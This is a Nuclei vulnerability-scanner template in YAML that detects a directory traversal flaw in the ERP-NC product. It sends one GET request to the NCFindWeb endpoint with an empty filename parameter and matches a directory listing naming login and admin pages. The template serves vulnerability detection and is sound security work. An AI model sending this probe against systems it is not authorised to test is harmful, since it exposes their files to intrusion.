nuclei-templates/vulnerabilities/other/erp-nc-directory-traversal....

29 lines
553 B
YAML
Raw Normal View History

2021-04-13 07:18:15 +00:00
id: erp-nc-directory-traversal
info:
name: ERP-NC directory traversal
author: pikpikcu
severity: high
reference:
- https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
2021-04-13 07:18:15 +00:00
tags: lfi,erp-nc
requests:
- method: GET
path:
- "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename="
matchers-condition: and
matchers:
- type: word
words:
- "Client"
- "ncwslogin.jsp"
- "admin.jsp"
part: body
2021-04-13 20:23:24 +00:00
condition: and
2021-04-13 07:18:15 +00:00
- type: status
status:
- 200